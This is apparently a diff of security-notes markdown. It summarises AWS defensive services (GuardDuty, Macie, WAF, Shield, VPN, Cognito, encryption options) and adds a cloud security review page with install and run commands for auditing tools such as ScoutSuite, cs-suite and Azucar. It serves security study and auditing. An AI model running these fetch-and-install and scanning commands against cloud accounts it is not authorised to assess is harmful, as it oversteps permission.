Unrestricted, Amazon EBS Public Snapshots, Amazon RDS Public Snapshots, IAM Use, and MFA on root account. +Trusted advisor can send notifications and you can exclude items from it. +Trusted advisor data is **automatically refreshed every 24 hours**, **but** you can perform a **manual one 5 mins after the previous one.** + +## Amazon GuardDuty + +Amazon GuardDuty is a regional-based intelligent **threat detection service**, the first of its kind offered by AWS, which allows users to **monitor** their **AWS account** for **unusual and unexpected behavior by analyzing VPC Flow Logs, AWS CloudTrail management event logs, Cloudtrail S3 data event logs, and DNS logs**. It uses **threat intelligence feeds**, such as lists of malicious IP addresses and domains, and **machine learning** to identify **unexpected and potentially unauthorized and malicious activity** within your AWS environment. This can include issues like escalations of privileges, uses of exposed credentials, or communication with malicious IP addresses, or domains. +For example, GuardDuty can detect compromised EC2 instances serving malware or mining bitcoin. It also monitors AWS account access behavior for signs of compromise, such as unauthorized infrastructure deployments, like instances deployed in a Region that has never been used, or unusual API calls, like a password policy change to reduce password strength. +You can **upload list of whitelisted and blacklisted IP addresses** so GuardDuty takes that info into account. + +Finding summary: + +* Finding type +* Severity: 7-8.9High, 4-6.9Medium, 01-3.9Low +* Region +* Account ID +* Resource ID +* Time of detection +* Which threat list was used + +The body has this information: + +* Resource affected +* Action +* Actor: Ip address, port and domain +* Additional Information + +You can invite other accounts to a different AWS GuardDuty account so **every account is monitored from the same GuardDuty**. The master account must invite the member accounts and then the representative of the member account must accept the invitation. +There are different IAM Role permissions to allow GuardDuty to get the information and to allow a user to upload IPs whitelisted and blacklisted. +GuarDuty uses a service-linked role called "AWSServiceRoleForAmazonGuardDuty" that allows it to retrieve metadata from affected endpoints. + +You pay for the processing of your log files, per 1 million events per months from CloudTrail and per GB of analysed logs from VPC Flow + +When a user disable GuardDuty, it will stop monitoring your AWS environment and it won't generate any new findings at all, and the existing findings will be lost. +If you just stop it, the existing findings will remain. + +## Amazon Macie + +The main function of the service is to provide an automatic method of **detecting, identifying, and also classifying data** that you are storing within your AWS account. + +The service is backed by **machine learning**, allowing your data to be actively reviewed as different actions are taken within your AWS account. Machine learning can spot access patterns and **user behavior** by analyzing **cloud trail event** data to **alert against any unusual or irregular activity**. Any findings made by Amazon Macie are presented within a dashboard which can trigger alerts, allowing you to quickly resolve any potential threat of exposure or compromise of your data. + +Amazon Macie will automatically and continuously **monitor and detect new data that is stored in Amazon S3**. Using the abilities of machine learning and artificial intelligence, this service has the ability to familiarize over time, access patterns to data. +Amazon Macie also uses natural language processing methods to **classify and interpret different data types and content**. NLP uses principles from computer science and computational linguistics to look at the interactions between computers and the human language. In particular, how to program computers to understand and decipher language data. The **service can automatically assign business values to data that is assessed in the form of a risk score**. This enables Amazon Macie to order findings on a priority basis, enabling you to focus on the most critical alerts first. In addition to this, Amazon Macie also has the added benefit of being able to **monitor and discover security changes governing your data**. As well as identify specific security-centric data such as access keys held within an S3 bucket. + +This protective and proactive security monitoring enables Amazon Macie to identify critical, sensitive, and security focused data such as API keys, secret keys, in addition to PII \(personally identifiable information\) and PHI data. + +This is useful to avoid data leaks as Macie will detect if you are exposing people information to the Internet. + +It's a **regional service**. + +It requires the existence of IAM Role 'AWSMacieServiceCustomerSetupRole' and it needs AWS CloudTrail to be enabled. + +Pre-defined alerts categories: + +* Anonymized access +* Config compliance +* Credential Loss +* Data compliance +* Files hosting +* Identity enumeration +* Information loss +* Location anomaly +* Open permissions +* Privilege escalation +* Ransomware +* Service disruption +* Suspicious access + +The **alert summary** provides detailed information to allow you to respond appropriately. It has a description that provides a deeper level of understanding of why it was generated. It also has a breakdown of the results. + +The user has the possibility to create new custom alerts. + +**Dashboard categorization**: + +* S3 Objects for selected time range +* S3 Objects +* S3 Objects by PII - Personally Identifiable Information +* S3 Objects by ACL +* High-risk CloudTrail events and associated users +* High-risk CloudTrail errors and associated users +* Activity Location +* CloudTrail Events +* Activity ISPs +* CloudTrail user identity types + +**User Categories**: Macie categorises the users in the following categories: + +* **Platinum**: Users or roles considered to be making high risk API calls. Often they have admins privileges. You should monitor the pretty god in case they are compromised +* **Gold**: Users or roles with history of calling APIs related to infrastructure changes. You should also monitor them +* **Silver**: Users or roles performing medium level risk API calls +* **Bronze**: Users or roles using lowest level of risk based on API calls + +**Identity types:** + +* Root: Request made by root user +* IAM user: Request made by IAM user +* Assumed Role: Request made by temporary assumed credentials \(AssumeRole API for STS\) +* Federated User: Request made using temporary credentials \(GetFederationToken API fro STS\) +* AWS Account: Request made by a different AWS account +* AWS Service: Request made by an AWS service + +**Data classification**: 4 file classifications exists: + +* Content-Type: list files based on content-type detected. The given risk is determined by the type of content detected. +* File Extension: Same as content-type but based on the extension +* Theme: Categorises based on a series of keywords detected within the files +* Regex: Categories based on specific regexps + +The final risk of a file will be the highest risk found between those 4 categories + +The research function allows to create you own queries again all Amazon Macie data and perform a deep dive analysis of the data. You can filter results based on: CloudTrail Data, S3 Bucket properties and S3 Objects + +It possible to invite other accounts to Amazon Macie so several accounts share Amazon Macie. + +## Route 53 + +You can very easily create **health checks for web pages** via Route53. For example you can create HTTP checks on port 80 to a page to check that the web server is working. + +Route 53 service is mainly used for checking the health of the instances. To check the health of the instances we can ping a certain DNS point and we should get response from the instance if the instances are healthy. + +## CloufFront + +Amazon CloudFront is AWS's **content delivery network that speeds up distribution** of your static and dynamic content through its worldwide network of edge locations. When you use a request content that you're hosting through Amazon CloudFront, the request is routed to the closest edge location which provides it the lowest latency to deliver the best performance. When **CloudFront access logs** are enabled you can record the request from each user requesting access to your website and distribution. As with S3 access logs, these logs are also **stored on Amazon S3 for durable and persistent storage**. There are no charges for enabling logging itself, however, as the logs are stored in S3 you will be stored for the storage used by S3. + +The log files capture data over a period of time and depending on the amount of requests that are received by Amazon CloudFront for that distribution will depend on the amount of log fils that are generated. It's important to know that these log files are not created or written to on S3. S3 is simply where they are delivered to once the log file is full. **Amazon CloudFront retains these logs until they are ready to be delivered to S3**. Again, depending on the size of these log files this delivery can take **between one and 24 hours**. + +**By default cookie logging is disabled** but you can enable it. + +## VPC + +### VPC Flow Logs + +Within your VPC, you could potentially have hundreds or even thousands of resources all communicating between different subnets both public and private and also between different VPCs through VPC peering connections. **VPC Flow Logs allows you to capture IP traffic information that flows between your network interfaces of your resources within your VPC**. + +Unlike S3 access logs and CloudFront access logs, the **log data generated by VPC Flow Logs is not stored in S3. Instead, the log data captured is sent to CloudWatch logs**. + +Limitations: + +* If you are running a VPC peered connection, then you'll only be able to see flow logs of peered VPCs that are within the same account. +* If you are still running resources within the EC2-Classic environment, then unfortunately you are not able to retrieve information from their interfaces +* Once a VPC Flow Log has been created, it cannot be changed. To alter the VPC Flow Log configuration, you need to delete it and then recreate a new one. +* The following traffic is not monitored and captured by the logs. DHCP traffic within the VPC, traffic from instances destined for the Amazon DNS Server. +* Any traffic destined to the IP address for the VPC default router and traffic to and from the following addresses, 169.254.169.254 which is used for gathering instance metadata, and 169.254.169.123 which is used for the Amazon Time Sync Service. +* Traffic relating to an Amazon Windows activation license from a Windows instance +* Traffic between a network load balancer interface and an endpoint network interface + +For every network interface that publishes data to the CloudWatch log group, it will use a different log stream. And within each of these streams, there will be the flow log event data that shows the content of the log entries. Each of these **logs captures data during a window of approximately 10 to 15 minutes**. + +![](../.gitbook/assets/image%20%28432%29.png) + +![](../.gitbook/assets/image%20%28433%29.png) + +### Subnets + +Subnets helps to enforce a greater level of security. **Logical grouping of similar resources** also helps you to maintain an **ease of management** across your infrastructure. +Valid CIDR are from a /16 netmask to a /28 netmask. +A subnet cannot be in different availability zones at the same time. + +By having **multiple Subnets with similar resources grouped together**, it allows for greater security management. By implementing **network level virtual firewalls,** called network access control lists, or **NACLs**, it's possible to **filter traffic** on specific ports from both an ingress and egress point at the Subnet level. + +When you create a subnet the **network** and **broadcast address** of the subnet **can't be used** for host addresses and **AWS reserves the first three host IP addresses** of each subnet **for** **internal AWS usage**: he first host address used is for the VPC router. The second address is reserved for AWS DNS and the third address is reserved for future use. + +It's called **public subnets** to those that have **direct access to the Internet, whereas private subnets do not.** + +In order to make a subnet public you need to **create** and **attach** an **Internet gateway** to your VPC. This Internet gateway is a managed service, controlled, configured, and maintained by AWS. It scales horizontally automatically, and is classified as a highly valuable component of your VPC infrastructure. Once your Internet gateway is attached to your VPC, you have a gateway to the Internet. However, at this point, your instances have no idea how to get out to the Internet. As a result, you need to add a default route to the route table associated with your subnet. The route could have a **destination value of 0.0. 0. 0/0, and the target value will be set as your Internet gateway ID**. + +By default, all subnets have the automatic assigned of public IP addresses turned off but it can be turned on. + +**A local route within a route table enables communication between VPC subnets.** + +If you are **connection a subnet with a different subnet you cannot access the subnets connected** with the other subnet, you need to create connection with them directly. **This also applies to internet gateways**. You cannot go through a subnet connection to access internet, you need to assign the internet gateway to your subnet. + +### VPC Peering + +VPC peering allows you to **connect two or more VPCs together**, using IPV4 or IPV6, as if they were a part of the same network. + +Once the peer connectivity is established, **resources in one VPC can access resources in the other**. The connectivity between the VPCs is implemented through the existing AWS network infrastructure, and so it is highly available with no bandwidth bottleneck. As **peered connections operate as if they were part of the same network**, there are restrictions when it comes to your CIDR block ranges that can be used. +If you have **overlapping or duplicate CIDR** ranges for your VPC, then **you'll not be able to peer the VPCs** together. +Each AWS VPC will **only communicate with its peer**. As an example, if you have a peering connection between VPC 1 and VPC 2, and another connection between VPC 2 and VPC 3 as shown, then VPC 1 and 2 could communicate with each other directly, as can VPC 2 and VPC 3, however, VPC 1 and VPC 3 could not. **You can't route through one VPC to get to another.** + +## AWS Secrets Manager + +AWS Secrets Manager is a great service to enhance your security posture by allowing you to **remove any hard-coded secrets within your application and replacing them with a simple API call** to the aid of your secrets manager which then services the request with the relevant secret. As a result, AWS Secrets Manager acts as a **single source of truth for all your secrets across all of your applications**. + +AWS Secrets Manager enables the **ease of rotating secrets** and therefore enhancing the security of that secret. An example of this could be your database credentials. Other secret types can also have automatic rotation enabled through the use of lambda functions, for example, API keys. + +Access to your secrets within AWS Secret Manager is governed by fine-grained IAM identity-based policies in addition to resource-based policies. + +To allow a user form a different account to access your secret you need to authorize him to access the secret and also authorize him to decrypt the secret in KMS. The Key policy also needs to allows the external user to use it. + +**AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.** + +## EMR + +EMR is a managed service by AWS and is comprised of a **cluster of EC2 instances that's highly scalable** to process and run big data frameworks such Apache Hadoop and Spark. + +From EMR version 4.8.0 and onwards, we have the ability to create a **security configuration** specifying different settings on **how to manage encryption for your data within your clusters**. You can either encrypt your data at rest, data in transit, or if required, both together. The great thing about these security configurations is they're not actually a part of your EC2 clusters. + +One key point of EMR is that **by default, the instances within a cluster do not encrypt data at rest**. Once enabled, the following features are available. + +* **Linux Unified Key Setup:** EBS cluster volumes can be encrypted using this method whereby you can specify AWS **KMS** to be used as your key management provider, or use a custom key provider. +* **Open-Source HDFS encryption:** This provides two Hadoop encryption options. Secure Hadoop RPC which would be set to privacy which uses simple authentication security layer, and data encryption of HDFS Block transfer which would be set to true to use the AES-256 algorithm. + +From an encryption in transit perspective, you could enable **open source transport layer security** encryption features and select a certificate provider type which can be either PEM where you will need to manually create PEM certificates, bundle them up with a zip file and then reference the zip file in S3 or custom where you would add a custom certificate provider as a Java class that provides encryption artefacts. + +Once the TLS certificate provider has been configured in the security configuration file, the following encryption applications specific encryption features can be enabled which will vary depending on your EMR version. + +* Hadoop might reduce encrypted shuffle which uses TLS. Both secure Hadoop RPC which uses Simple Authentication Security Layer, and data encryption of HDFS Block Transfer which uses AES-256, are both activated when at rest encryption is enabled in the security configuration. +* Presto: When using EMR version 5.6.0 and later, any internal communication between Presto nodes will use SSL and TLS. +* Tez Shuffle Handler uses TLS. +* Spark: The Akka protocol uses TLS. Block Transfer Service uses Simple Authentication Security Layer and 3DES. External shuffle service uses the Simple Authentication Security Layer. + +## RDS - Relational Database Service + +RDS allows you to set up a **relational database** using a number of **different engines** such as MySQL, Oracle, SQL Server, etc. During the creation of your RDS database instance, you have the opportunity to **Enable Encryption at the Configure Advanced Settings** screen under Database Options and Enable Encryption. + +By enabling your encryption here, you are enabling **encryption at rest for your storage, snapshots, read replicas and your back-ups**. Keys to manage this encryption can be issued by using **KMS**. It's not possible to add this level of encryption after your database has been created. **It has to be done during its creation**. + +However, there is a **workaround allowing you to encrypt an unencrypted database as follows**. You can create a snapshot of your unencrypted database, create an encrypted copy of that snapshot, use that encrypted snapshot to create a new database, and then, finally, your database would then be encrypted. + +Amazon RDS **sends data to CloudWatch every minute by default.** + +In addition to encryption offered by RDS itself at the application level, there are **additional platform level encryption mechanisms** that could be used for protecting data at rest including **Oracle and SQL Server Transparent Data Encryption**, known as TDE, and this could be used in conjunction with the method order discussed but it would **impact the performance** of the database MySQL cryptographic functions and Microsoft Transact-SQL cryptographic functions. + +If you want to use the TDE method, then you must first ensure that the database is associated to an option group. Option groups provide default settings for your database and help with management which includes some security features. However, option groups only exist for the following database engines and versions. + +Once the database is associated with an option group, you must ensure that the Oracle Transparent Data Encryption option is added to that group. Once this TDE option has been added to the option group, it cannot be removed. TDE can use two different encryption modes, firstly, TDE tablespace encryption which encrypts entire tables and, secondly, TDE column encryption which just encrypts individual elements of the database. + +## Amazon Kinesis Firehouse + +Amazon Firehose is used to deliver **real-time streaming data to different services** and destinations within AWS, many of which can be used for big data such as S3 Redshift and Amazon Elasticsearch. + +The service is fully managed by AWS, taking a lot of the administration of maintenance out of your hands. Firehose is used to receive data from your data producers where it then automatically delivers the data to your chosen destination. + +Amazon Streams essentially collects and processes huge amounts of data in real time and makes it available for consumption. + +This data can come from a variety of different sources. For example, log data from the infrastructure, social media, web clicks during feeds, market data, etc. So now we have a high-level overview of each of these. We need to understand how they implement encryption of any data process in stored should it be required. + +When clients are **sending data to Kinesis in transit**, the data can be sent over **HTTPS**, which is HTTP with SSL encryption. However, once it enters the Kinesis service, it is then unencrypted by default. Using both **Kinesis Streams and Firehose encryption, you can assure your streams remain encrypted up until the data is sent to its final destination.** As **Amazon Streams** now has the ability to implement SSE encryption using KMS to **encrypt data as it enters the stream** directly from the producers. + +If Amazon **S3** is used as a **destination**, Firehose can implement encryption using **SSE-KMS on S3**. + +As a part of this process, it's important to ensure that both producer and consumer applications have permissions to use the KMS key. Otherwise encryption and decryption will not be possible, and you will receive an unauthorized KMS master key permission error. + +Kinesis SSE encryption will typically call upon KMS to **generate a new data key every five minutes**. So, if you had your stream running for a month or more, thousands of data keys would be generated within this time frame. + +## Amazon Redshift + +Redshift is a fully managed service that can scale up to over a petabyte in size, which is used as a **data warehouse for big data solutions**. Using Redshift clusters, you are able to run analytics against your datasets using fast, SQL-based query tools and business intelligence applications to gather greater understanding of vision for your business. + +**Redshift offers encryption at rest using a four-tired hierarchy of encryption keys using either KMS or CloudHSM to manage the top tier of keys**. **When encryption is enabled for your cluster, it can't be disable and vice versa**. When you have an unencrypted cluster, it can't be encrypted. + +Encryption for your cluster can only happen during its creation, and once encrypted, the data, metadata, and any snapshots are also encrypted. The tiering level of encryption keys are as follows, **tier one is the master key, tier two is the cluster encryption key, the CEK, tier three, the database encryption key, the DEK, and finally tier four, the data encryption keys themselves**. + +### KMS + +During the creation of your cluster, you can either select the **default KMS key** for Redshift or select your **own CMK**, which gives you more flexibility over the control of the key, specifically from an auditable perspective. + +The default KMS key for Redshift is automatically created by Redshift the first time the key option is selected and used, and it is fully managed by AWS. The CMK is known as the master key, tier one, and once selected, Redshift can enforce the encryption process as follows. So Redshift will send a request to KMS for a new KMS key. + +So Redshift will send a request to KMS for a new KMS key. + +This KMS key is then encrypted with the CMK master key, tier one. This encrypted KMS data key is then used as the cluster encryption key, the CEK, tier two. This CEK is then sent by KMS to Redshift where it is stored separately from the cluster. Redshift then sends this encrypted CEK to the cluster over a secure channel where it is stored in memory. + +Redshift then requests KMS to decrypt the CEK, tier two. This decrypted CEK is then also stored in memory. Redshift then creates a random database encryption key, the DEK, tier three, and loads that into the memory of the cluster. The decrypted CEK in memory then encrypts the DEK, which is also stored in memory. + +This encrypted DEK is then sent over a secure channel and stored in Redshift separately from the cluster. Both the CEK and the DEK are now stored in memory of the cluster both in an encrypted and decrypted form. The decrypted DEK is then used to encrypt data keys, tier four, that are randomly generated by Redshift for each data block in the database. + +You can use AWS Trusted Advisor to monitor the configuration of your Amazon S3 buckets and ensure that bucket logging is enabled, which can be useful for performing security audits and tracking usage patterns in S3. + +### CloudHSM + +When working with CloudHSM to perform your encryption, firstly you must set up a trusted connection between your HSM client and Redshift while using client and server certificates. + +This connection is required to provide secure communications, allowing encryption keys to be sent between your HSM client and your Redshift clusters. Using a randomly generated private and public key pair, Redshift creates a public client certificate, which is encrypted and stored by Redshift. This must be downloaded and registered to your HSM client, and assigned to the correct HSM partition. + +You must then configure Redshift with the following details of your HSM client: the HSM IP address, the HSM partition name, the HSM partition password, and the public HSM server certificate, which is encrypted by CloudHSM using an internal master key. Once this information has been provided, Redshift will confirm and verify that it can connect and access development partition. + +If your internal security policies or governance controls dictate that you must apply key rotation, then this is possible with Redshift enabling you to rotate encryption keys for encrypted clusters, however, you do need to be aware that during the key rotation process, it will make a cluster unavailable for a very short period of time, and so it's best to only rotate keys as and when you need to, or if you feel they may have been compromised. + +During the rotation, Redshift will rotate the CEK for your cluster and for any backups of that cluster. It will rotate a DEK for the cluster but it's not possible to rotate a DEK for the snapshots stored in S3 that have been encrypted using the DEK. It will put the cluster into a state of 'rotating keys' until the process is completed when the status will return to 'available'. + +## WAF + +AWS WAF is a web application firewall that helps **protect your web applications** or APIs against common web exploits that may affect availability, compromise security, or consume excessive resources. AWS WAF gives you control over **how traffic reaches your applications** by enabling you to create security rules that block common attack patterns, such as SQL injection or cross-site scripting, and rules that filter out specific traffic patterns you define. + +So there are a number of essential components relating to WAF, these being: Conditions, Rules and Web access control lists, also known as Web ACLs + +### Conditions + +Conditions allow you to specify **what elements of the incoming HTTP or HTTPS request you want WAF to be monitoring** \(XSS, GEO - filtering by location-, IP address, Size constraints, SQL Injection attacks, strings and regex matching\). Note that if you are restricting a country from cloudfront, this request won't arrive to the waf. + +You can have **100 conditions of each type**, such as Geo Match or size constraints, however **Regex** is the **exception** to this rule where **only 10 Regex** conditions are allowed but this limit is possible to increase. You are able to have **100 rules and 50 Web ACLs per AWS account**. You are limited to **5 rate-based-rules** per account. Finally you can have **10,000 requests per second** when **using WAF** within your application load balancer. + +### Rules + +Using these conditions you can create rules: For example, block request if 2 conditions are met. +When creating your rule you will be asked to select a **Rule Type**: **Regular Rule** or **Rate-Based Rule**. + +The only **difference** between a rate-based rule and a regular rule is that **rate-based** rules **count** the **number** of **requests** that are being received from a particular IP address over a time period of **five minutes**. + +When you select a rate-based rule option, you are asked to **enter the maximum number of requests from a single IP within a five minute time frame**. When the count limit is **reached**, **all other requests from that same IP address is then blocked**. If the request rate falls back below the rate limit specified the traffic is then allowed to pass through and is no longer blocked. When setting your rate limit it **must be set to a value above 2000**. Any request under this limit is considered a Regular Rule. + +### Actions + +An action is applied to each rule, these actions can either be **Allow**, **Block** or **Count**. + +* When a request is **allowed**, it is **forwarded** onto the relevant CloudFront distribution or Application Load Balancer. +* When a request is **blocked**, the request is **terminated** there and no further processing of that request is taken. +* A **Count** action will **count the number of requests that meet the conditions** within that rule. This is a really good option to select when testing the rules to ensure that the rule is picking up the requests as expected before setting it to either Allow or Block. + +If an **incoming request does not meet any rule** within the Web ACL then the request takes the action associated to a **default action** specified which can either be **Allow** or **Block**. An important point to make about these rules is that they are **executed in the order that they are listed within a Web ACL**. So be careful to architect this order correctly for your rule base, **typically** these are **ordered** as shown: + +1. WhiteListed Ips as Allow. +2. BlackListed IPs Block +3. Any Bad Signatures also as Block. + +### CloudWatch + +WAF CloudWatch metrics are reported **in one minute intervals by default** and are kept for a two week period. The metrics monitored are AllowedRequests, BlockedRequests, CountedRequests, and PassedRequests. + +## AWS Firewall Manager + +AWS Firewall Manager simplifies your administration and maintenance tasks across multiple accounts and resources for **AWS WAF, AWS Shield Advanced, Amazon VPC security groups, and AWS Network Firewall**. With Firewall Manager, you set up your AWS WAF firewall rules, Shield Advanced protections, Amazon VPC security groups, and Network Firewall firewalls just once. The service **automatically applies the rules and protections across your accounts and resources**, even as you add new resources. + +It can **group and protect specific resources together**, for example, all resources with a particular tag or all of your CloudFront distributions. One key benefit of Firewall Manager is that it **automatically protects certain resources that are added** to your account as they become active. + +**Requisites**: Created a Firewall Manager Master Account, setup an AWS organization and have added our member accounts and enable AWS Config. + +A **rule group** \(a set of WAF rules together\) can be added to an AWS Firewall Manager Policy which is then associated to AWS resources, such as your cloudfront distributions or application load balances. + +**Firewall Manager policies only allow "Block" or "Count"** options for a rule group \(no "Allow" option\). + +## AWS Shield + +AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS. + +**AWS Shield Standard** is **free** to everyone, and it offers DDoS **protection** against some of the more common layer three, the **network layer**, and layer four, **transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53. + +**AWS Shield advanced** offers a **greater level of protection** for DDoS attacks across a wider scope of AWS services for an additional cost. This advanced level offers protection against your web applications running on EC2, CloudFront, ELB and also Route 53. In addition to these additional resource types being protected, there are enhanced levels of DDoS protection offered compared to that of Standard. And you will also have **access to a 24-by-seven specialized DDoS response team at AWS, known as DRT**. + +Whereas the Standard version of Shield offered protection against layer three and layer four, **Advanced also offers protection against layer seven, application, attacks.** + +## VPN + +### Site-to-Site VPN + +**Connect your on premisses network with your VPC.** + +#### Concepts + +* **VPN connection**: A secure connection between your on-premises equipment and your VPCs. +* **VPN tunnel**: An encrypted link where data can pass from the customer network to or from AWS. + + Each VPN connection includes two VPN tunnels which you can simultaneously use for high availability. + +* **Customer gateway**: An AWS resource which provides information to AWS about your customer gateway device. +* **Customer gateway device**: A physical device or software application on your side of the Site-to-Site VPN connection. +* **Virtual private gateway**: The VPN concentrator on the Amazon side of the Site-to-Site VPN connection. You use a virtual private gateway or a transit gateway as the gateway for the Amazon side of the Site-to-Site VPN connection. +* **Transit gateway**: A transit hub that can be used to interconnect your VPCs and on-premises networks. You use a transit gateway or virtual private gateway as the gateway for the Amazon side of the Site-to-Site VPN connection. + +#### Limitations + +* IPv6 traffic is not supported for VPN connections on a virtual private gateway. +* An AWS VPN connection does not support Path MTU Discovery. + +In addition, take the following into consideration when you use Site-to-Site VPN. + +* When connecting your VPCs to a common on-premises network, we recommend that you use non-overlapping CIDR blocks for your networks. + +### Components of Client VPN + +**Connect from your machine to your VPC** + +#### Concepts + +* **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated. +* **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone. +* **Route**: Each Client VPN endpoint has a route table that describes the available destination network routes. Each route in the route table specifies the path for traffic to specific resources or networks. +* **Authorization rules:** An authorization rule **restricts the users who can access a network**. For a specified network, you configure the Active Directory or identity provider \(IdP\) group that is allowed access. Only users belonging to this group can access the specified network. **By default, there are no authorization rules** and you must configure authorization rules to enable users to access resources and networks. +* **Client:** The end user connecting to the Client VPN endpoint to establish a VPN session. End users need to download an OpenVPN client and use the Client VPN configuration file that you created to establish a VPN session. +* **Client CIDR range:** An IP address range from which to assign client IP addresses. Each connection to the Client VPN endpoint is assigned a unique IP address from the client CIDR range. You choose the client CIDR range, for example, `10.2.0.0/16`. +* **Client VPN ports:** AWS Client VPN supports ports 443 and 1194 for both TCP and UDP. The default is port 443. +* **Client VPN network interfaces:** When you associate a subnet with your Client VPN endpoint, we create Client VPN network interfaces in that subnet. **Traffic that's sent to the VPC from the Client VPN endpoint is sent through a Client VPN network interface**. Source network address translation \(SNAT\) is then applied, where the source IP address from the client CIDR range is translated to the Client VPN network interface IP address. +* **Connection logging:** You can enable connection logging for your Client VPN endpoint to log connection events. You can use this information to run forensics, analyze how your Client VPN endpoint is being used, or debug connection issues. +* **Self-service portal:** You can enable a self-service portal for your Client VPN endpoint. Clients can log into the web-based portal using their credentials and download the latest version of the Client VPN endpoint configuration file, or the latest version of the AWS provided client. + +#### Limitations + +* **Client CIDR ranges cannot overlap with the local CIDR** of the VPC in which the associated subnet is located, or any routes manually added to the Client VPN endpoint's route table. +* Client CIDR ranges must have a block size of at **least /22** and must **not be greater than /12.** +* A **portion of the addresses** in the client CIDR range are used to **support the availability** model of the Client VPN endpoint, and cannot be assigned to clients. Therefore, we recommend that you **assign a CIDR block that contains twice the number of IP addresses that are required** to enable the maximum number of concurrent connections that you plan to support on the Client VPN endpoint. +* The **client CIDR range cannot be changed** after you create the Client VPN endpoint. +* The **subnets** associated with a Client VPN endpoint **must be in the same VPC**. +* You **cannot associate multiple subnets from the same Availability Zone with a Client VPN endpoint**. +* A Client VPN endpoint **does not support subnet associations in a dedicated tenancy VPC**. +* Client VPN supports **IPv4** traffic only. +* Client VPN is **not** Federal Information Processing Standards \(**FIPS**\) **compliant**. +* If multi-factor authentication \(MFA\) is disabled for your Active Directory, a user password cannot be in the following format. + + ```text + SCRV1:: + ``` + +* The self-service portal is **not available for clients that authenticate using mutual authentication**. + +## Amazon Cognito + +Amazon Cognito provides **authentication, authorization, and user management** for your web and mobile apps. Your users can sign in directly with a **user name and password**, or through a **third party** such as Facebook, Amazon, Google or Apple. + +The two main components of Amazon Cognito are user pools and identity pools. **User pools** are user directories that provide **sign-up and sign-in options for your app users**. **Identity pools** enable you to grant your users **access to other AWS services**. You can use identity pools and user pools separately or together. + +### **User pools** + +A user pool is a user directory in Amazon Cognito. With a user pool, your users can **sign in to your web or mobile app** through Amazon Cognito, **or federate** through a **third-party** identity provider \(IdP\). Whether your users sign in directly or through a third party, all members of the user pool have a directory profile that you can access through an SDK. + +User pools provide: + +* Sign-up and sign-in services. +* A built-in, customizable web UI to sign in users. +* Social sign-in with Facebook, Google, Login with Amazon, and Sign in with Apple, and through SAML and OIDC identity providers from your user pool. +* User directory management and user profiles. +* Security features such as multi-factor authentication \(MFA\), checks for compromised credentials, account takeover protection, and phone and email verification. +* Customized workflows and user migration through AWS Lambda triggers. + +### **Identity pools** + +With an identity pool, your users can **obtain temporary AWS credentials to access AWS services**, such as Amazon S3 and DynamoDB. Identity pools support anonymous guest users, as well as the following identity providers that you can use to authenticate users for identity pools: + +* Amazon Cognito user pools +* Social sign-in with Facebook, Google, Login with Amazon, and Sign in with Apple +* OpenID Connect \(OIDC\) providers +* SAML identity providers +* Developer authenticated identities + +To save user profile information, your identity pool needs to be integrated with a user pool. + diff --git a/cloud-security/cloud-security-review.md b/cloud-security/cloud-security-review.md new file mode 100644 index 00000000000..396c5a40e05 --- /dev/null +++ b/cloud-security/cloud-security-review.md @@ -0,0 +1,109 @@ +# Cloud security review + +**Check for nice cloud hacking tricks in** [**https://hackingthe.cloud/aws/general-knowledge/connection-tracking/**](https://hackingthe.cloud/aws/general-knowledge/connection-tracking/)\*\*\*\* + +## Generic tools + +There are several tools that can be used to test different cloud environments. The installation steps and links are going to be indicated in this section. + +### [ScoutSuite](https://github.com/nccgroup/ScoutSuite) + +AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure + +```text +pip3 install scoutsuite +``` + +### [cs-suite](https://github.com/SecurityFTW/cs-suite) + +AWS, GCP, Azure, DigitalOcean + +```text +git clone https://github.com/SecurityFTW/cs-suite.git && cd cs-suite/ +pip install virtualenv +virtualenv -p python2.7 venv +source venv/bin/activate +pip install -r requirements.txt +python cs.py --help +``` + +### Nessus + +Nessus has an _**Audit Cloud Infrastructure**_ scan supporting: AWS, Azure, Office 365, Rackspace, Salesforce. Some extra configurations in **Azure** are needed to obtain a **Client Id**. + +### Common Sense + +Take a look to the **network access rules** and detect if the services are correctly protected: + +* ssh available from everywhere? +* Unencrypted services running \(telnet, http, ...\)? +* Unprotected admin consoles? +* In general, check that all services are correctly protected depending on their needs + +## Azure + +Access the portal here: [http://portal.azure.com/](http://portal.azure.com/) +To start the tests you should have access with a user with **Reader permissions over the subscription** and **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts** you can fix it with the **role Storage Account Contributor**. + +It is recommended to **install azure-cli** in a **linux** and **windows** virtual machines \(to be able to run powershell and python scripts\): [https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest) +Then, run `az login` to login. Note the **account information** and **token** will be **saved** inside _<HOME>/.azure_ \(in both Windows and Linux\). + +Remember that if the **Security Centre Standard Pricing Tier** is being used and **not** the **free** tier, you can **generate** a **CIS compliance scan report** from the azure portal. Go to _Policy & Compliance-> Regulatory Compliance_ \(or try to access [https://portal.azure.com/\#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/22](https://portal.azure.com/#blade/Microsoft_Azure_Security/SecurityMenuBlade/22)\). +\_\_If the company is not paying for a Standard account you may need to review the **CIS Microsoft Azure Foundations Benchmark** by "hand" \(you can get some help using the following tools\). Download it from [**here**](https://www.newnettechnologies.com/cis-benchmark.html?keyword=&gclid=Cj0KCQjwyPbzBRDsARIsAFh15JYSireQtX57C6XF8cfZU3JVjswtaLFJndC3Hv45YraKpLVDgLqEY6IaAhsZEALw_wcB#microsoft-azure). + +### Run scanners + +Run the scanners to look for **vulnerabilities** and **compare** the security measures implemented with **CIS**. + +```bash +pip install scout +scout azure --cli --report-dir + +#Fix azureaudit.py before launching cs.py +#Adding "j_res = {}" on line 1074 +python cs.py -env azure + +#Azucar is an Azure security scanner for PowerShell (https://github.com/nccgroup/azucar) +#Run it from its folder +.\Azucar.ps1 -AuthMode Interactive -ForceAuth -ExportTo EXCEL 